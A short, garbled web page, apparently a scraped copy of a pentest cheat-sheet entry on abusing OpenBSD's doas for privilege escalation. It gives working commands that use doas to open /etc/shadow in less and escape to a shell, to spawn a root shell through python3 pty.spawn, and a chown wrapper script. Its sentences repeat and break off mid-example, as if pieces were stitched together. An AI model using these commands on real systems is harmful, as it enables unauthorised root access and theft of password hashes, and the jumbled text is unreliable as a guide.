Hacktricks Doas < Trusted · HACKS >

doas /usr/bin/less /etc/shadow # inside less: !/bin/sh Or Python bypass:

In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest. doas was originally from OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: /etc/doas.conf hacktricks doas

#!/bin/sh doas /usr/bin/chown user "$1" Exploit: doas /usr/bin/less /etc/shadow # inside less:

doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")' Many binaries allow shell escapes. we’ll break down how doas works